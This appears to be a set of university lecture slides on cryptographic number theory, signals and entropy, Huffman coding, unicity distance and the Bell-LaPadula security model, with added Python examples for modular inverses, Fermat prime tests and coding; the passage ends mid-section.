    4    1    4    1    4    1    4    1    4    1    4    1    4    1
    5   10    5   10    5   10    5   10    5   10    5   10    5   10
    6    6    6    6    6    6    6    6    6    6    6    6    6    6
    7    4   13    1    7    4   13    1    7    4   13    1    7    4
    8    4    2    1    8    4    2    1    8    4    2    1    8    4
    9    6    9    6    9    6    9    6    9    6    9    6    9    6
   10   10   10   10   10   10   10   10   10   10   10   10   10   10
   11    1   11    1   11    1   11    1   11    1   11    1   11    1
   12    9    3    6   12    9    3    6   12    9    3    6   12    9
   13    4    7    1   13    4    7    1   13    4    7    1   13    4
   14    1   14    1   14    1   14    1   14    1   14    1   14    1

Table

Table illustrates Euler’s theorem for n = 15 = 3 · 5, with

$\phi(15) = 15 \cdot (1 - 1/3) \cdot (1 - 1/5) = (3 - 1) \cdot (5 - 1) = 8$

Notice here that a 1 is reached when the power is 8, but only for numbers with no divisors in common with 15.

For other base numbers, the value never gets to 1.

Euler

Arithmetic in the exponent is taken mod $\phi(n)$, so that, if a has no divisors in common with n,

$a^x \bmod n = a^{x \bmod \phi(n)} \bmod n$.

If n = 15 as above, then $\phi(n) = 8$, and the reduction applies whenever neither 3 nor 5 divides evenly into a. Thus, for example,

$a^{28} \bmod 15 = a^{28 \bmod 8} \bmod 15 = a^4 \bmod 15$.


Before we leave Euler...

We are interested in...

Large prime numbers (p, q)

Their product n = pq

The Euler phi function φ(n) = (p− 1)(q − 1)


Before we leave Euler...

In a similar fashion to before we can do BIG number arithmetic easily

Consider also the ease of multiplying, and difficulty of factoring...


Before we leave Euler...

29*37=?


The Euclidean algorithm

Multiplicative inverse is not intuitive and requires some theory to compute.

$a^{-1}$ can be computed efficiently using the extended Euclidean algorithm.

Law GCD-1: The cryptographer’s first and oldest favorite algorithm is the extended Euclidean algorithm, which computes the greatest common divisor of two positive integers a and b and also supplies integers x and y such that x*a + y*b = gcd(a, b).


Finding GCD

• For the gcd of 819 and 462,

– factor the numbers as:
  ∗ 819 = 3 · 3 · 7 · 13
  ∗ 462 = 2 · 3 · 7 · 11

– gcd is 21 = 3 · 7

But there is no efficient algorithm to factor integers.


The Euclidean algorithm

1. Repeatedly divide the larger one by the smaller, and

2. Write larger = smaller * quotient + remainder

3. Repeat using the two numbers “smaller” and “remainder”.

4. When you get a 0 remainder, then you have the gcd of the original two numbers.


Example

819 = 462 · 1 + 357 (Step 0)

462 = 357 · 1 + 105 (Step 1)

357 = 105 · 3 + 42 (Step 2)

105 = 42 · 2 + 21 (Step 3, so GCD = 21)

42 = 21 · 2 + 0 (Step 4)


The extended Euclidean algorithm

Given the two positive integers 819 and 462, the extended Euclidean algorithm finds unique integers a and b so that

a · 819 + b · 462 = gcd(819, 462) = 21

In this case, (−9) · 819 + 16 · 462 = 21

(See notes...)

How does this give us a mechanism to calculate the multiplicative inverse of an element?


The extended Euclidean algorithm

x ∗ a + y ∗ p = gcd(x, y)

Now - if p is a prime, then gcd(x, y) = 1, and so

x ∗ a + y ∗ p = 1

In the field $Z_p$, this indicates that x ∗ a = 1, and so $x = a^{-1}$.

The extended Euclidean algorithm has given us a mechanism to calculate the multiplicative inverse of an element.
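
The extended Euclidean algorithm and the inverse it yields when gcd(a, p) = 1, as an added Python example that is not part of the original notes. It reproduces the 819 and 462 result above and goes one step further by inverting an exponent mod φ(n) for n = 29 · 37; the function names and the exponent e = 5 are choices made for this illustration.

```python
# Added example: extended Euclid, modular inverse, and an exponent inverse mod phi(n).


def egcd(a, b):
    """Return (g, x, y) such that x*a + y*b == g == gcd(a, b)."""
    old_r, r = a, b
    old_x, x = 1, 0
    old_y, y = 0, 1
    while r != 0:
        q = old_r // r                  # larger = smaller * quotient + remainder
        old_r, r = r, old_r - q * r     # carry on with "smaller" and "remainder"
        old_x, x = x, old_x - q * x     # keep the coefficients of a in step
        old_y, y = y, old_y - q * y     # keep the coefficients of b in step
    return old_r, old_x, old_y


def modinv(a, m):
    """Return the inverse of a modulo m, or raise ValueError if gcd(a, m) != 1."""
    g, x, _ = egcd(a % m, m)
    if g != 1:
        raise ValueError(f"{a} has no inverse modulo {m}: gcd is {g}")
    return x % m                        # normalise into the range 0..m-1


def exponent_pair(p, q, e):
    """For n = p*q return (n, d) where e*d mod phi(n) == 1, phi(n) = (p-1)(q-1)."""
    phi = (p - 1) * (q - 1)
    return p * q, modinv(e, phi)


def roundtrip(m, p=29, q=37, e=5):
    """Raise m to the power e and then d, mod n; the original m must come back."""
    n, d = exponent_pair(p, q, e)
    return pow(pow(m, e, n), d, n)


if __name__ == "__main__":
    print(egcd(819, 462))               # the worked example from the slides
    print(modinv(5, 17))                # an inverse in the field Z_17
    print(exponent_pair(29, 37, 5))     # n and the inverse exponent d
    print(roundtrip(42))
    try:
        modinv(6, 15)                   # 6 shares the factor 3 with 15
    except ValueError as err:
        print("rejected:", err)
```

The ValueError branch is the case the slide's condition rules out: when a shares a divisor with the modulus, no inverse exists.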


Fast integer exponentiation

Law EXP-1: Many cryptosystems in modern cryptography depend on a fast algorithm to perform integer exponentiation.

Examples in notes... not so important, just nice to know it can be done.


Back to primes

For 2500 years mathematicians studied prime numbers just because they were interesting, without any idea they would have practical applications. Possible real-world uses:

1. Sometimes... a prime number of ball bearings arranged in a bearing, to cut down on periodic wear (also gear teeth).

2. Possibly... the 13 and 17-year periodic emergence of cicadas may be due to coevolution with predators (that lost and became extinct).


Since 1976

Now finally, in cryptography, prime numbers have come into their own.

Law PRIME-1: A source of large random prime integers is an essential part of many current cryptosystems.


Checking for primes

It is hard to check that an integer is “certainly” prime, but...

It is easy to check that an integer is “probably” prime.

Tests to check if a number is probably prime are called pseudo-prime tests.


Prime check

Start with a property of a prime number, such as Fermat’s Theorem, mentioned in the previous chapter:

if p is a prime and a is any non-zero number less than p, then $a^{p-1} \bmod p = 1$.

If one can find a number a for which Fermat’s Theorem does not hold, then the number p in the theorem is definitely not a prime.

If the theorem holds, then p is called a pseudo-prime with respect to a, and it might actually be a prime.


Prime check

So the simplest possible pseudo-prime test would just take a small value of a, say 2 or 3, and check if Fermat’s Theorem is true.

Simple Pseudo-prime Test: If a very large random integer p (100 decimal digits or more) is not divisible by a small prime, and if $3^{p-1} \bmod p = 1$, then the number is prime except for a vanishingly small probability, which one can ignore.


Prime check - 1105,1729

One could just repeat the test for other integers besides 3 as the base, but unfortunately there are non-primes (called Carmichael numbers) that satisfy Fermat’s theorem for all values of a even though they are not prime.

Chances of a mistake less than $10^{-41}$; in practice use better tests.

Law PRIME-2: Just one simple pseudo-prime test is enough to test that a very large random integer is probably prime.
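
The fast exponentiation and the simple pseudo-prime test described above, as an added Python example that is not part of the original notes. The small-prime cut-off of 37 and the composite 12403 = 79 · 157 are choices made here; 1105 and 1729 are the Carmichael numbers named in the slide title.

```python
# Added example: square-and-multiply plus the Fermat pseudo-prime test.
from math import gcd

SMALL_PRIMES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)  # assumed cut-off


def power_mod(base, exponent, modulus):
    """Compute base**exponent mod modulus in O(log exponent) multiplications."""
    result = 1 % modulus
    base %= modulus
    while exponent > 0:
        if exponent & 1:                    # this bit of the exponent is set
            result = (result * base) % modulus
        base = (base * base) % modulus      # square once per exponent bit
        exponent >>= 1
    return result


def fermat_passes(n, a):
    """True when a**(n-1) mod n == 1, i.e. n is a pseudo-prime with respect to a."""
    return power_mod(a, n - 1, n) == 1


def simple_pseudo_prime_test(n):
    """Trial division by small primes, then one Fermat check with base 3."""
    if n < 2:
        return False
    for p in SMALL_PRIMES:
        if n % p == 0:
            return n == p
    return fermat_passes(n, 3)


def failing_bases(n):
    """Bases in 2..n-1 for which Fermat's test exposes n as composite."""
    return [a for a in range(2, n) if not fermat_passes(n, a)]


def only_shared_factor_bases_fail(n):
    """For composite n: True if every exposing base shares a factor with n."""
    return all(gcd(a, n) > 1 for a in failing_bases(n))


if __name__ == "__main__":
    print(simple_pseudo_prime_test(2**127 - 1))     # a known prime
    for n in (1105, 1729):                          # Carmichael numbers
        print(n, simple_pseudo_prime_test(n), only_shared_factor_bases_fail(n))
    # 12403 has no factor up to 37 and passes base 3, yet base 2 exposes it.
    print(simple_pseudo_prime_test(12403), fermat_passes(12403, 2))
```

The composite 12403 passes the base-3 test but is exposed by base 2, whereas for 1105 and 1729 the only bases that ever fail are those sharing a factor with n. That is why trial division catches these two small cases and why repeating Fermat's test with more bases does not help against Carmichael numbers in general.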


Summary of topics

We can do BIG arithmetic in these fields

We can do fast exponentiation and modulo arithmetic

We can check for primes


Chapter 4

Lecture 4 - Preliminaries


Chocolate fish people

Andreas Schuth

Chong Jun Yong

Ashley Ng *

Wu Yongzheng *

Zhang Huaixing *

Terence Sangeet


The extended Euclidean algorithm

x ∗ a + y ∗ p = gcd(x, y)

Now - if p is a prime, then gcd(x, y) = 1, and so

x ∗ a + y ∗ p = 1

WRONG!


The extended Euclidean algorithm

x ∗ a + y ∗ p = gcd(a, p)

Now - if p is a prime, then gcd(a, p) = 1, and so

x ∗ a + y ∗ p = 1

RIGHT!


Last session

• Math preliminaries

– Fermat’s little theorem
– Euler


This session

• Physical preliminaries

• Entropy


Preliminaries - physical

Consider:

• Is the data analog or digital?

• What limits are placed on it?

• How is it to be transmitted?

• How can you be sure that it is correct/accurate?


Analog and digital

[Figure: three curves plotted for x from -10 to 10, vertical axis from -1 to 5: sin(x)+4, (sin(x)>=0)+1 and real(int(sin(x)*5))/10.]

The plot is amplitude versus time.


Analog and digital

Repetition rate (if it repeats) is called the frequency, and is measured in Hertz.

The peak to peak signal level is called the amplitude.

The simplest analog signal is called the sine wave.

By mixing we may create any desired periodic waveform.


Analog and digital

[Figure: three curves plotted for x from -10 to 10, vertical axis from -1 to 5: sin(x)+4, (sin(3*x)/3)+2 and sin(x)+(sin(3*x)/3).]

The plot is amplitude versus time. (Time domain)


Analog and digital

[Figure: spectrum with components of amplitude 1.0 at f, 0.333 at 3f and 0.2 at 5f.]

The plot is amplitude vs frequency. (Frequency domain).


Analog and digital

If we were to continue in the same progression, the resultant waveform would be a square wave:

$\sum_{n=1}^{\infty} \frac{1}{n} \sin(2\pi n f)$ (for odd n) ⇒ square wave, frequency f

This representation method is known as Fourier Analysis after Jean-Baptiste Fourier.


Fourier analysis

$\frac{4}{\pi}\left(\sin(2\pi f t) + \frac{1}{3}\sin(6\pi f t) + \frac{1}{5}\sin(10\pi f t) + \frac{1}{7}\sin(14\pi f t) + \dots\right)$

[Figure: four curves plotted for x from -10 to 10, vertical axis from 3 to 11: sin(x)+10, sin(x)+(sin(3*x)/3)+8, sin(x)+(sin(3*x)/3)+(sin(5*x)/5)+6 and sin(x)+(sin(3*x)/3)+(sin(5*x)/5)+(sin(7*x)/7)+4.]


Fourier analysis

Transformation between equivalent time domain and frequency domain representations.

A piecewise continuously differentiable periodic function in the time domain may be transformed to a discrete aperiodic function in the frequency domain.

smooth, repeating ↔ pointy, not repeating

f(t) ↔ F(ω)


Fourier analysis

Time domain               Frequency domain         Description
Continuous, periodic   ↔  Discrete, aperiodic      Fourier series
Continuous, aperiodic  ↔  Continuous, aperiodic    Fourier transform
Discrete, periodic     ↔  Discrete, periodic       Discrete Fourier series
Discrete, aperiodic    ↔  Continuous, periodic     Discrete Fourier transform


Accuracy

Relationship between the bandwidth of a channel, and how accurate a signal is.

Another way of stating this is to point out that the higher frequency components are important - they are needed to re-create the original signal faithfully. If we had two 1,000Hz signals, one a triangle, one a square wave - if they were both passed through the 1,000Hz bandwidth limited channel above, they would look identical (a sine wave).


Example transforms

[Figures: four slides of example transform pairs, each plotting a time-domain function f(t) against t beside its frequency-domain transform F(ω) against ω.]

Convolution

The Fourier transform of the convolution f(t) ∗ g(t) is the product of the Fourier transforms of the functions F(ω) and G(ω), and vice versa.

f(t) ∗ g(t) ↔ F(ω) × G(ω)

f(t) × g(t) ↔ F(ω) ∗ G(ω)

We can use convolution to easily predict the functions that result from complex signal filtering or sampling.


Convolution

[Figure: f(t) against t with its transform F(ω) against ω; g(t) with its transform G(ω); and the product f(t).g(t) with its transform F(ω) * G(ω).]


Modulation

A baseband signal is one in which the data is directly converted to a signal and transmitted. When the signal is imposed on another signal, the process is called modulation.

We may modulate for several reasons:

• The media may not support the baseband signal

• We may wish to use a single transmission medium to transport many signals


Modulation methods

• Frequency modulation - frequency shift keying (FSK)

• Amplitude modulation

• Phase modulation - phase shift keying (PSK)

• Combinations of the above (QAM)


Baseband digital encoding

The simplest encoding scheme is just to use a low level for a zero bit, and a high level for a one bit. As long as both ends of a channel are synchronized in some manner, we can transfer data.

On the other hand, if the ends of the channel are not synchronized we might use a simple encoding scheme, such as Bipolar or Manchester encoding, to transfer synchronizing (clock) information on the same channel.


Baseband digital encoding

[Figure: timing diagrams for Bipolar and for Manchester encoding, each showing BITS, CODE, CLOCK and RECVD traces against TIME.]

In Bipolar encoding, a 1 is transmitted with a positive pulse, a 0 with a negative pulse. Sometimes called return to zero encoding.

In Manchester encoding, there is a transition in the center of each bit cell.


Summary

Data commonly transferred digitally

Trade-off between bandwidth, accuracy of any signal


Information theory

The term information is commonly understood. Consider the following two sentences:

1. The sun will rise tomorrow.

2. The Fiji rugby team will win against the All Blacks (New Zealand rugby team) the next time they play.

Question: Which sentence contains the most information?


Information theory

Temperature today is OK, Temperature today is OK, Temperature today is OK, Temperature today is OK, Temperature today is OK, Temperature today is OK, Temperature today is OK, Temperature today is OK, Temperature today is OK, Temperature today is OK, ...

... total information here is close to zero!

More information means less predictable

Less information means more predictable


Information theory

Nyquist (1924) and Hartley (1928) laid the foundations:

Hartley showed that the information content is proportional to the logarithm of the number of possible messages. Integers between 1 and n need $\log_2 n$ bits.

Shannon developed a mathematical treatment of communication and information in an important paper at

http://cm.bell-labs.com/cm/ms/what/shannonday/paper.html


Information theory model

[Figure: Information source → Transmitter → Channel → Receiver → Destination (or sink), with a Noise source feeding into the Channel.]

The relevance of Shannon to secrecy is in another important paper at

http://www.cs.ucla.edu/~jkong/research/security/shannon.html


Entropy

In our communication model, the units of transmission are called messages, constructed from an alphabet of (say) n symbols $x \in \{x_1, \dots, x_n\}$, each with a probability of transmission $P_x$.

We associate with each symbol x a quantity $H_x$ which is a measure of the information associated with that symbol.

$H_x = P_x \log_2 \frac{1}{P_x}$


Entropy

$H_x = P_x \log_2 \frac{1}{P_x}$

If the probability of occurrence of each symbol is the same, we can derive Hartley’s result, that the average amount of information transmitted in a single symbol (the source entropy) is

$H(X) = \log_2 n$

where X is a label referring to each of the source symbols $x_1, \dots, x_n$.


Entropy units

Our units for entropy can be bits/second or bits/symbol, and we also sometimes use unit-less relative entropy measures (relative to the entropy of the system if all symbols were equally likely).


Entropy - same probability

Symbols   Entropy of each symbol               Bits needed
2         H_x = (1/2) log2 2 = 1/2             2 ∗ 1/2 = 1
4         H_x = (1/4) log2 4 = 1/2             4 ∗ 1/2 = 2
8         H_x = (1/8) log2 8 = 3/8             8 ∗ 3/8 = 3
16        H_x = (1/16) log2 16 = 4/16          16 ∗ 4/16 = 4
21        H_x = (1/21) log2 21 = 4.39/21       21 ∗ 4.39/21 = 4.39


Entropy - different probability

However, if the probability of occurrence of each symbol is not the same, we derive the following result, that the source entropy is

$H(X) = \sum_{i=1}^{n} P_{x_i} \log_2 \frac{1}{P_{x_i}}$

Shannon’s paper shows that H determines the channel capacity required to transmit the desired information with the most efficient coding scheme.


Entropy - different probability

If we had a source emitting two symbols, 0 and 1, with probabilities of 1 and 0, then the entropy of the source is

$H(X) = \sum_{i=1}^{n} P_{x_i} \log_2 \frac{1}{P_{x_i}}$

$= \log_2 1 + 0 * \log_2 0$

$= 0$ bits/symbol


Entropy - different probability

If we were transmitting a sequence of letters A, B, C, D, E and F with probabilities 1/2, 1/4, 1/16, 1/16, 1/16 and 1/16, the entropy for the system is

$H(X) = \frac{1}{2}\log_2 2 + \frac{1}{4}\log_2 4 + \frac{4}{16}\log_2 16$

$= 0.5 + 0.5 + 1.0$

$= 2$ bits/symbol


Encoding the letters

A fixed size 3-bit code, and then a more complex code:

Symbol   3-bit code   Complex code
A        000          0
B        001          10
C        010          1100
D        011          1101
E        100          1110
F        101          1111


Analysis of encoding

The average length of the binary digits needed to encode a typical sequence of symbols using the 3-bit code is

$L(X) = \sum_{i=1}^{n} P_{x_i} \cdot \mathrm{sizeof}(x_i)$

$= \frac{1}{2} * 3 + \frac{1}{4} * 3 + \frac{4}{16} * 3$

$= 1.5 + 0.75 + 0.75$

$= 3$ bits/symbol


Analysis of encoding

The average length of the binary digits needed to encode a typical sequence of symbols using the complex encoding is

$L(X) = \sum_{i=1}^{n} P_{x_i} \cdot \mathrm{sizeof}(x_i)$

$= \frac{1}{2} * 1 + \frac{1}{4} * 2 + \frac{4}{16} * 4$

$= 0.5 + 0.5 + 1.0$

$= 2$ bits/symbol

i.e. it is more efficient, averaging only 2 bits for each symbol transmitted.
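
The entropy and average code length calculations above for the A to F source, as an added Python example that is not part of the original notes. The function names and the 16-symbol sample message are constructed for this illustration; the probabilities and both code tables are the ones on the slides.

```python
# Added example: entropy and code length for the A..F source on the slides.
from math import log2

PROBS = {"A": 1/2, "B": 1/4, "C": 1/16, "D": 1/16, "E": 1/16, "F": 1/16}
FIXED_CODE = {"A": "000", "B": "001", "C": "010",
              "D": "011", "E": "100", "F": "101"}
COMPLEX_CODE = {"A": "0", "B": "10", "C": "1100",
                "D": "1101", "E": "1110", "F": "1111"}
# Constructed sample whose letter counts match PROBS exactly (8, 4, 1, 1, 1, 1).
SAMPLE = "AAAAAAAABBBBCDEF"


def entropy(probs):
    """H(X) = sum of P * log2(1/P); a symbol with P = 0 contributes nothing."""
    return sum(p * log2(1 / p) for p in probs.values() if p > 0)


def average_length(probs, code):
    """L(X) = sum of P * (number of bits in the symbol's codeword)."""
    return sum(p * len(code[s]) for s, p in probs.items())


def is_prefix_free(code):
    """True when no codeword is a prefix of another (needed to decode unambiguously)."""
    words = sorted(code.values())
    return all(not b.startswith(a) for a, b in zip(words, words[1:]))


def encode(message, code):
    return "".join(code[s] for s in message)


def decode(bits, code):
    """Decode a prefix-free code bit by bit; reject bits left over at the end."""
    reverse = {w: s for s, w in code.items()}
    out, current = [], ""
    for bit in bits:
        current += bit
        if current in reverse:
            out.append(reverse[current])
            current = ""
    if current:
        raise ValueError(f"trailing bits {current!r} do not form a codeword")
    return "".join(out)


if __name__ == "__main__":
    print("H(X) =", entropy(PROBS), "bits/symbol")
    for name, code in (("3-bit", FIXED_CODE), ("complex", COMPLEX_CODE)):
        bits = encode(SAMPLE, code)
        print(name, average_length(PROBS, code), len(bits), decode(bits, code))
```

The complex code reaches the source entropy of 2 bits/symbol because every probability is a power of 1/2 and each codeword length equals log2(1/P).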


Entropy and transmission rate

If our source was transmitting 0 and 1 bits with equal probability, but the received data was corrupted 50% of the time, we might reason that our rate r(X) of information transmission was 0.5, because half of our data is getting through correctly.

[Figure: Information source → Transmitter → Channel → Receiver → Destination (or sink), with a Noise source feeding into the Channel.]


Entropy and transmission rate

However, a better argument is to consider the difference between the entropy of the source and the conditional entropy of the received data:

$r(X) = H(X) - H(X \mid y)$

where $H(X \mid y)$ is the conditional entropy of the received data.


Entropy and transmission rate

$H(X \mid y) = 0.5 * \log_2 2 + 0.5 * \log_2 2 = 1$

and $H(X) = 1$ (shown before)

so $r(X) = H(X) - H(X \mid y) = 0$ bits/symbol

This is a much better measure of the amount of information transmitted.


Redundancy

The ratio of the entropy of a source $H(X)$ to what it would be if the symbols had equal probabilities $H'(X)$, is called the relative entropy. We use the notation $H_r(X)$, and

$H_r(X) = \frac{H(X)}{H'(X)}$

The redundancy of the source is $1 - H_r(X)$

$R(X) = 1 - H_r(X)$


Redundancy

If we look at English text a symbol at a time¹, the redundancy is about 0.7.

This indicates that it should be simple to compress English text by about 70%.

This sort of redundancy is a unitless relative redundancy.

¹ That is, without considering letter sequences.


Unicity distance

Defined by Shannon - an approximation to the amount of ciphertext such that the sum of the source entropy and the encryption key entropy is the same as the number of ciphertext bits used.

Ciphertexts longer than this have only one meaningful decryption

Ciphertexts shorter than this may have more than one meaningful decryption (and hence be stronger, as a hacker will not know which one is correct)


Unicity distance

The longer the unicity distance, the better the cryptosystem

Unicity distance U is the entropy of the key divided by the redundancy of the source, and is approximately

$U \approx \frac{\log_2 K}{R \log_2 P}$

(K is the key size, R is the redundancy, P is the number of symbols).


Unicity distance

26 letter alphabet, and 26! keys

$U \approx \frac{\log_2 26!}{0.5 \log_2 26} \approx \frac{88}{0.7 * 4.7} \approx 27$

So given a ciphertext of 27 symbols, a unique decoding is possible.


Unicity distance

In general

Longer key length means longer unicity distance

Redundancy inversely proportional to unicity distance

Estimates the minimum amount of ciphertext for which there is only a single plaintext solution on doing a brute force attack...


Chapter 5

Lecture 5 - Preliminaries


Last session

• Physical preliminaries

• Entropy


This session

• Channel properties

• Entropy

• Models


Hugh’s bigger mistakes...


Incorrect

[Figure: plot with vertical axis marked 0.2, 0.333 and 1.0, horizontal axis marked f, 3f and 5f]

The plot is frequency vs time. (Frequency domain).


Correct

[Figure: plot with vertical axis marked 0.2, 0.333 and 1.0, horizontal axis marked f, 3f and 5f]

The plot is amplitude vs frequency. (Frequency domain).


Incorrect

If we had a source emitting two symbols, 0 and 1, with probabilities of 1 and 0, then the entropy of the source is

$$
\begin{aligned}
H(X) &= \sum_{i=1}^{n} P_{x_i} \log_2 \frac{1}{P_{x_i}} \\
     &= \log_2 1 + 0 \times \log_2 0 \\
     &= 0 \text{ bits/symbol}
\end{aligned}
$$


Correct

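If we had a source emitting two symbols, 0 and 1, with probabilities of 1 and 0, then the entropy of the source is

$$
\begin{aligned}
H(X) &= \sum_{i=1}^{n} P_{x_i} \log_2 \frac{1}{P_{x_i}} \\
     &= 1 \times \log_2 1 + 0 \times \log_2 \frac{1}{0} \\
     &= 0 \text{ bits/symbol}
\end{aligned}
$$

Note that

$$\lim_{y \to 0} y \log_2 \frac{1}{y} = 0$$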


Page 46 of notes

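The first two equations that begin H(X) should begin with L(X).

$$
\begin{aligned}
L(X) &= \sum_{i=1}^{n} P_{x_i} \cdot \mathrm{sizeof}(x_i) \\
     &= \frac{1}{2} \times 3 + \frac{1}{4} \times 3 + \frac{4}{16} \times 3 \\
     &= 1.5 + 0.75 + 0.75 \\
     &= 3 \text{ bits/symbol}
\end{aligned}
$$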


1/2 of data through correctly...

Received data is corrupted 50% of the time:

[Figure: Before and After panels]


Convolution

Applet to do convolution: http://www.cs.brown.edu/exploratories/freeSoftware/repository/edu/brown/cs/exploratories/applets/convolution/convolution_java_browser.html


This session

• Channel properties

• Entropy

• Security models


Shannon and Nyquist

[Figure: information source, transmitter, channel, receiver and destination (or sink), with a noise source on the channel]

$$\text{Maximum BPS} = W \log_2\left(1 + \frac{S}{N}\right) \text{ bits/sec}$$


Shannon and Nyquist example

If we had a telephone system with a bandwidth of 3,000 Hz, and a S/N of 30 dB (about 1024:1)

$$
\begin{aligned}
D &= 3000 \times \log_2 1025 \\
  &\approx 3000 \times 10 \\
  &\approx 30000 \text{ bps}
\end{aligned}
$$

This is a typical maximum bit rate achievable over the telephone network.


Nyquist

The maximum data rate over a limited bandwidth (W) channel with V discrete levels is:

$$\text{Maximum data rate} = 2W \log_2 V \text{ bits/sec}$$

For example, two-level data cannot be transmitted over the telephone network faster than 6,000 BPS, because the bandwidth of the telephone channel is only about 3,000 Hz.


Nyquist example

If we had a telephone system with a bandwidth of 3,000 Hz, and using 256 levels

$$
\begin{aligned}
D &= 2 \times 3000 \times \log_2 256 \\
  &= 6000 \times 8 \\
  &= 48000 \text{ bps}
\end{aligned}
$$

In these equations, the assumption is that the relative entropies of the signal and noise are a maximum (that they are random).


This session

• Channel properties

• Entropy

• Security models


Maximum entropy

In practical systems, signals rarely have maximum entropy, and we can do better - there may be methods to compress the data [2].

[2] Note: we must also differentiate between lossy and lossless compression schemes. A signal with an entropy of 0.5 may not be compressed more than 2:1 unless you use a lossy compression scheme. JPEG and Wavelet compression schemes can achieve huge data size reductions without visible impairment of images, but the restored images are not the same as the original ones - they just look the same. The lossless compression schemes used in PkZip, gzip or GIF files (LZW) cannot achieve compression ratios as high as that found in JPEG.


Huffman encoding

An immediate question of interest is “What is the minimum length bit string that may be used to compress a string of symbols?”.

The Huffman encoding minimizes the bit length given the frequency of occurrence of each symbol [3]. The resultant bit string in the best case will be the length predicted from the calculation of the source entropy.

[3] Note that it presupposes knowledge about these frequencies.


Huffman encoding

How can we get knowledge about the frequency of (say) the letters in the English language?

(answer) - we read Snapple bottle tops...


Huffman encoding

[Figure: Huffman tree with leaves E, T, A, O, N and S; each branch is labelled 0 or 1]

Less common characters use longer bit strings.


Huffman encoding

Our algorithm for encoding is simple - we calculate the tree encoding knowing the frequency of each letter:

Symbol  Coding
E       00
T       10
A       010
O       011
N       110
S       111

To decode, traverse the tree taking a left or right path according to the bit. The leaf has our symbol.
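The table and the tree walk above, as an added Python example (not part of the original notes): it decodes a bit string with the slide's code table, then builds a Huffman code from letter frequencies and compares its average length with the source entropy. The frequencies in FREQ are constructed for illustration; the notes give none.

```python
import heapq
import math
from itertools import count

# Code table copied from the slide.
SLIDE_CODE = {"E": "00", "T": "10", "A": "010", "O": "011", "N": "110", "S": "111"}

# Constructed relative frequencies (assumption, not from the notes).
FREQ = {"E": 0.30, "T": 0.22, "A": 0.14, "O": 0.13, "N": 0.11, "S": 0.10}


def build_tree(code):
    """Turn a code table into a binary tree of nested dicts; leaves are symbols."""
    root = {}
    for symbol, bits in code.items():
        node = root
        for b in bits[:-1]:
            node = node.setdefault(b, {})
            if isinstance(node, str):
                raise ValueError("not a prefix code")
        if bits[-1] in node:
            raise ValueError("not a prefix code")
        node[bits[-1]] = symbol
    return root


def encode(text, code):
    return "".join(code[ch] for ch in text)


def decode(bits, code):
    """Walk the tree one bit at a time; emit a symbol at each leaf."""
    root = build_tree(code)
    node, out = root, []
    for b in bits:
        node = node[b]
        if isinstance(node, str):
            out.append(node)
            node = root
    if node is not root:
        raise ValueError("bit string ends in the middle of a code word")
    return "".join(out)


def huffman(freq):
    """Build a Huffman code by repeatedly merging the two least likely subtrees."""
    tie = count()  # tie-breaker so the heap never compares dicts
    heap = [(p, next(tie), {s: ""}) for s, p in freq.items()]
    heapq.heapify(heap)
    while len(heap) > 1:
        p0, _, c0 = heapq.heappop(heap)
        p1, _, c1 = heapq.heappop(heap)
        merged = {s: "0" + b for s, b in c0.items()}
        merged.update({s: "1" + b for s, b in c1.items()})
        heapq.heappush(heap, (p0 + p1, next(tie), merged))
    return heap[0][2]


def entropy(freq):
    """Source entropy in bits/symbol."""
    return sum(p * math.log2(1 / p) for p in freq.values() if p > 0)


def average_length(freq, code):
    """Expected code word length in bits/symbol."""
    return sum(p * len(code[s]) for s, p in freq.items())


if __name__ == "__main__":
    built = huffman(FREQ)
    print("decoded:", decode("1100111000111", SLIDE_CODE))
    print("entropy  %.3f bits/symbol" % entropy(FREQ))
    print("huffman  %.3f bits/symbol" % average_length(FREQ, built))
```

With these frequencies the generated code has the same word lengths as the slide's table, and its average length sits just above the entropy, which is the lower bound.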


Case study - MNP5 and V.42bis

MNP5 and V.42bis are compression schemes commonly used on modems.

MNP5 suffers from the unfortunate property that it will expand data with maximum or near-maximum entropy (instead of compressing it).

V.42bis does not have this property - it uses a large dictionary, and will not try to compress an already compressed stream.


MNP5

MNP5 uses two different compression methods, switching between them as appropriate. The methods are:

• Adaptive frequency encoding

• Run-length encoding

Run-length encoding sends the bytes with a byte count value, and doubles the size of a data stream with maximum entropy.


Adaptive frequency encoding

3-bit header  Body size  Total code size  Number of codewords
000           1 bit      4 bits           2
001           1 bit      4 bits           2
010           2 bits     5 bits           4
011           3 bits     6 bits           8
100           4 bits     7 bits           16
101           5 bits     8 bits           32
110           6 bits     9 bits           64
111           7 bits     10 bits          128

3/4 of our codewords are larger than they would be if we did not use this encoding scheme


Further study

• Textbook Chapter 32

• Shannon’s paper on secrecy systems at http://www.cs.ucla.edu/~jkong/research/security/shannon.html.


This session

• Channel properties

• Entropy

• Security models


Preliminaries - security models

Definition: a range of formal policies for specifying the security of a system in terms of a (mathematical) model.

access control matrix

Bell-LaPadula

Biba

Clark-Wilson


Security model

Have a model

Determine properties

Verify implementations


Access control matrix

Rows of the matrix are subjects, columns are objects:

Objects: f1 f2 f3 f4

Subjects:

s1 read execute execute

s2 write read execute

s3 read write execute

s4 read write read

s4 cannot read f1. But subjects may collude...


Bell-LaPadula, confidentiality

Military style to assure confidentiality services.

Security levels in a (total) ordering formalizing a policy which restricts information flow from a higher security level to a lower security level.

Prevents lower-level subjects from accessing higher-level objects.

Section 5.2 in textbook


Bell-LaPadula, levels

1. Top secret (T)

2. Secret (S)

3. Confidential (C)

4. Unclassified (U)

where T > S > C > U. Access operations are visualized using an access control matrix, and are drawn from {read, write}.


BLP security property

The clearance classification for a subject s ∈ S or object o ∈ O is denoted $L(s) = l_s$ or $L(o) = l_o$. We might then assume we can use this to construct a first simple security property:

• No read-up-1: s can read o if and only if $l_o \le l_s$, and s has read access in the access control matrix.

This single property is insufficient to ensure the restriction we need for the security policy.


BLP Trojan Horse property

Consider the case when a low security subject creates a high security object (say a program) which then reads a high security file, copying it to a low security one. This behaviour is commonly called a Trojan Horse. A second property is needed:

• No write-down-1: s can write o if and only if $l_s \le l_o$, and s has write access in the access control matrix.

These two properties can be used to enforce our security policy, but with a severe restriction. For example, how does any subject write down without invalidating a security policy?


BLP extended

A security category c ∈ C is used to classify objects in the model, with any object belonging to a set of categories. Each pair (l × c) is termed a security level, and forms a lattice.

Lattice - chapter 30 in textbook


BLP extended

We define a relation between security levels:

• The security level (l, c) dominates (l′, c′) (written (l, c) dom (l′, c′)) iff l′ ≤ l, and c′ ⊆ c.

A subject s and object o then belong to one of these security levels.


BLP extended

The new properties are:

